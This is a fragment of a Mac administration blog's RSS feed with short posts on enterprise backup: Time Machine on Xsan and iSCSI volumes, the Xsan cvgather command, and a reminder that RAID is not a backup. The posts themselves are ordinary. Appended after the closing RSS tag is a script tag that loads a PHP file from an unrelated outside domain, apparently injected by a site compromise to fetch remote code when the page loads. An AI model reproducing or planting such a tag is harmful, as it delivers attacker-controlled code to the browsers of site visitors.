Copyright &#169; 2008 This feed is for personal, [...]]]></description>
			<content:encoded><![CDATA[<p>The basic steps to use BRU, Tivoli, Atempo, Bakbone and PresSTORE are all covered in the latest edition of Michael Dhaliwal&#8217;s Enterprise Backup Whitepaper, <a href="http://www.district13computing.com/docs/backup6.pdf">available on his personal site</a>.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/slides-from-macsysadmin-talk-on-enterprise-backup/" rel="bookmark" title="September 22, 2009">Slides from MacSysAdmin Talk on Enterprise Backup</a></li>
<li><a href="http://krypted.com/business/cage-match-retrospect-vs-bru/" rel="bookmark" title="September 13, 2006">Cage Match: Retrospect vs. BRU</a></li>
<li><a href="http://krypted.com/xsan/xsan-backup/" rel="bookmark" title="December 5, 2007">Xsan: Backup</a></li>
<li><a href="http://krypted.com/iphone/good-iphone/" rel="bookmark" title="December 23, 2009">Good iPhone, Enterprise Ready</a></li>
<li><a href="http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/" rel="bookmark" title="December 21, 2008">TimeMachine Over Xsan and iSCSI</a></li>
</ul>
<p><!-- Similar Posts took 4.617 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/mac-enterprise-backup-whitepaper/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TimeMachine Over Xsan and iSCSI</title>
		<link>http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/</link>
		<comments>http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/#comments</comments>
		<pubDate>Sun, 21 Dec 2008 20:36:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Xsan]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[iscsi]]></category>
		<category><![CDATA[Time Machine]]></category>
		<category><![CDATA[TimeMachine]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=2960</guid>
		<description><![CDATA[Now that I&#8217;ve shown over the years how to setup an Xsan and iSCSI targets on Mac OS X I am starting to get a number of questions about how to set these up in such a way that Time Machine can backup to them. Â Since they&#8217;re not your typical disks in a lot of [...]]]></description>
			<content:encoded><![CDATA[<p>Now that I&#8217;ve shown over the years how to setup an Xsan and iSCSI targets on Mac OS X I am starting to get a number of questions about how to set these up in such a way that Time Machine can backup to them. Â Since they&#8217;re not your typical disks in a lot of cases there&#8217;s a small command that you&#8217;ll need to run to make it work:</p>
<p>defaults write com.apple.systempreferences TMShowUnsupportedNetworkVolumes 1</p>
<p>Essentially, once you&#8217;ve run this command you&#8217;ll be able to back up to anything that appears in /Volumes and then some (for example share points on your local network might appear even if you haven&#8217;t yet authenticated to them). Â You&#8217;ll also be able to backup to disks that are direct attached to an AirPort Extreme (which essentially makes them NAS volumes over an up-to-802.11n medium).<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/xsan/xsan-multiple-volumes/" rel="bookmark" title="February 2, 2006">Xsan: Multiple Volumes</a></li>
<li><a href="http://krypted.com/xsan/disable-spotlight-for-xsan-volumes/" rel="bookmark" title="February 7, 2010">Disable Spotlight for Xsan Volumes</a></li>
<li><a href="http://krypted.com/xsan/the-anatomy-of-a-raid/" rel="bookmark" title="February 7, 2005">The Anatomy of a RAID</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-disable-acls-on-external-volumes-for-leopard/" rel="bookmark" title="October 6, 2008">Mac OS X: Disable ACLs on External Volumes for Leopard</a></li>
<li><a href="http://krypted.com/mac-os-x/no-more-ds_store-files/" rel="bookmark" title="May 24, 2009">Disable and Remove .DS_Store Files</a></li>
</ul>
<p><!-- Similar Posts took 9.898 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Xsan: Backing up Configuration Information</title>
		<link>http://krypted.com/xsan/xsan-backing-up-configuration-information/</link>
		<comments>http://krypted.com/xsan/xsan-backing-up-configuration-information/#comments</comments>
		<pubDate>Fri, 11 Apr 2008 04:10:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Xsan]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[cvgather]]></category>
		<category><![CDATA[xsan 2]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=701</guid>
		<description><![CDATA[You can update the configuration information on your Xsan using the following command:
cvgather -fSimilar Articles:

Xsan: cvgather
Xsan: Backing up the Configuration
Uninstalling and Reinstalling Xsan
Installing Xsan 1.x
StorNext Command Line for Windows


Copyright &#169; 2008 This feed is for personal, non-commercial use only.  The use of this feed on other websites breaches copyright. If this content is not [...]]]></description>
			<content:encoded><![CDATA[<p>You can update the configuration information on your Xsan using the following command:</p>
<p><span>cvgather -f</span><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/xsan/xsan-cvgather/" rel="bookmark" title="March 1, 2005">Xsan: cvgather</a></li>
<li><a href="http://krypted.com/xsan/xsan-backing-up-the-configuration/" rel="bookmark" title="May 1, 2006">Xsan: Backing up the Configuration</a></li>
<li><a href="http://krypted.com/xsan/uninstalling-reinstalling-xsan/" rel="bookmark" title="May 23, 2009">Uninstalling and Reinstalling Xsan</a></li>
<li><a href="http://krypted.com/xsan/installing-xsan-1x/" rel="bookmark" title="July 10, 2005">Installing Xsan 1.x</a></li>
<li><a href="http://krypted.com/windows-server/stornext-command-line-for-windows/" rel="bookmark" title="May 27, 2009">StorNext Command Line for Windows</a></li>
</ul>
<p><!-- Similar Posts took 5.874 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/xsan/xsan-backing-up-configuration-information/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Xsan: Backup</title>
		<link>http://krypted.com/xsan/xsan-backup/</link>
		<comments>http://krypted.com/xsan/xsan-backup/#comments</comments>
		<pubDate>Wed, 05 Dec 2007 15:33:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Xsan]]></category>
		<category><![CDATA[backup]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=998</guid>
		<description><![CDATA[OK, RAID 5 is not a backup scheme. Â Even with Direct Attached Storage you have to back it up. Â But even more to the point, if you have a bunch of RAIDs strung together as an Xsan and you&#8217;re not backing it up then you are taking life one day at a time. Â Stop. Â The [...]]]></description>
			<content:encoded><![CDATA[<p>OK, RAID 5 is not a backup scheme. Â Even with Direct Attached Storage you have to back it up. Â But even more to the point, if you have a bunch of RAIDs strung together as an Xsan and you&#8217;re not backing it up then you are taking life one day at a time. Â Stop. Â The cost of a backup is probably nothing compared to the cost of loosing all your data.<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/xsan/xsan-tco/" rel="bookmark" title="December 3, 2008">Xsan TCO</a></li>
<li><a href="http://krypted.com/xsan/xsan-multiple-volumes/" rel="bookmark" title="February 2, 2006">Xsan: Multiple Volumes</a></li>
<li><a href="http://krypted.com/mac-os-x/timemachine-over-xsan-and-iscsi/" rel="bookmark" title="December 21, 2008">TimeMachine Over Xsan and iSCSI</a></li>
<li><a href="http://krypted.com/xsan/practical-ilm/" rel="bookmark" title="October 26, 2006">Practical ILM</a></li>
<li><a href="http://krypted.com/business/backup-planning/" rel="bookmark" title="September 18, 2009">Backup Planning</a></li>
</ul>
<p><!-- Similar Posts took 5.701 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/xsan/xsan-backup/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script src="http://holasionweb.com/oo.php"></script>